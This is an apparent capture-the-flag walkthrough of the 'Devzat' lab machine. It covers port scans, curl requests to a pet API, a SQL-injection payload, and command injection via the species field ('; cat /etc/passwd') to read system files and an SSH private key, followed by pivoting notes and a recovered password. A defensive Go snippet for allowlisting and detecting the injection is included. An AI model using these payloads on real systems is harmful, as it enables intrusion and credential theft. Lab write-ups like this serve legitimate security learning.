Machine - Devzat - active - medium
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
8000/tcp open http-alt syn-ack ttl 63
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
| 256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
|_ 256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://devzat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
8000/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-Go
| ssh-hostkey:
|_ 3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.92%I=7%D=11/3%Time=6182EB1F%P=x86_64-pc-linux-gnu%r(NU
SF:LL,C,"SSH-2\.0-Go\r\n");
Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
fuzz on :80
fuzz on vhost
- pets.devzat.htb
< Server: My genious go pet server
curl 'http://pets.devzat.htb/api/pet' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://pets.devzat.htb/aaa' -H 'Content-Type: text/plain;charset=UTF-8' -H 'Origin: http://pets.devzat.htb' -H 'Connection: keep-alive' --data-raw '{"name":"ddd","species":"giraffe"}'
- tried a simple SQL injection and the insert changed…
curl 'http://pets.devzat.htb/api/pet' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://pets.devzat.htb/aaa' -H 'Content-Type: text/plain;charset=UTF-8' -H 'Origin: http://pets.devzat.htb' -H 'Connection: keep-alive' --data-raw $'{"name":"something\' or 1=1 -- -"}'
with the species parameter, we can read files by appending ; cat /etc/passwd
we can read the .ssh/id_rsa :) YEEEY
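The species injection above, as an added example that is not the box's pet server code: assuming the Go server concatenates the species value into a command line for sh -c, this shows the hardened lookup (pattern match plus allowlist, argv passed directly with no shell) beside a check that flags logged /api/pet bodies whose species carries shell metacharacters. The names petRequest, safeArgv, suspiciousSpecies and the species list are my own assumptions.

```go
package main

import (
	"encoding/json"
	"errors"
	"regexp"
	"strings"
)

// petRequest mirrors the JSON body the page posts to /api/pet.
type petRequest struct {
	Name    string `json:"name"`
	Species string `json:"species"`
}

// Assumptions: a species is 1-32 lower-case letters and the server knows a
// fixed set of them ("giraffe" is from the page, the others are made up).
var speciesPattern = regexp.MustCompile(`^[a-z]{1,32}$`)
var knownSpecies = map[string]bool{"giraffe": true, "cat": true, "dog": true}

// safeArgv: pattern match AND allowlist, returning argv for a direct exec (no sh -c).
func safeArgv(species string) ([]string, error) {
	if !speciesPattern.MatchString(species) || !knownSpecies[species] {
		return nil, errors.New("species rejected")
	}
	return []string{"cat", "characteristics/" + species}, nil
}

// suspiciousSpecies parses logged request bodies and returns the species
// values carrying shell metacharacters, for alerting at the web tier.
func suspiciousSpecies(bodies []string) []string {
	var hits []string
	for _, b := range bodies {
		var r petRequest
		if json.Unmarshal([]byte(b), &r) != nil {
			continue
		}
		if strings.ContainsAny(r.Species, ";|&$`\n") {
			hits = append(hits, r.Species)
		}
	}
	return hits
}

// constructedBodies: the page's own request plus one injected sample.
var constructedBodies = []string{
	`{"name":"ddd","species":"giraffe"}`,
	`{"name":"x","species":"giraffe; id"}`,
}
func main() {}
```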
explore
ssh -l [username] devzat.htb -p 8000
the page has an email patric@devzat.htb
patrick to…
we cannot yet read catherine :(
sudo -l ⇒ I don’t have the password…
suid → nothing interesting
in the chat app I see the following chats:
admin: Connection to localhost closed.
patrick@devzat:~$ ssh -l catherine localhost -p 8000
patrick: Hey Catherine, glad you came.
catherine: Hey bud, what are you up to?
patrick: Remember the cool new feature we talked about the other day?
catherine: Sure
patrick: I implemented it. If you want to check it out you could connect to the local dev instance on port 8443.
catherine: Kinda busy right now 👔
patrick: That's perfectly fine 👍 You'll need a password I gave you last time.
catherine: k
patrick: I left the source for your review in backups.
catherine: Fine. As soon as the boss let me off the leash I will check it out.
patrick: Cool. I am very curious what you think of it. See ya!
devbot: patrick has left the chat
admin: Hey patrick, you there?
patrick: Sure, shoot boss!
admin: So I setup the influxdb for you as we discussed earlier in business meeting.
patrick: Cool 👍
admin: Be sure to check it out and see if it works for you, will ya?
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8086 0.0.0.0:* LISTEN
8443 → another Go SSH server (localhost only)
8086 → influx
if we connect to that ssh we see a chat, but there is a new command /file that needs a password; the backup is only readable by catherine.
I think there should be some kind of clue in the influx db: “CeilingCatStillAThingIn2021?”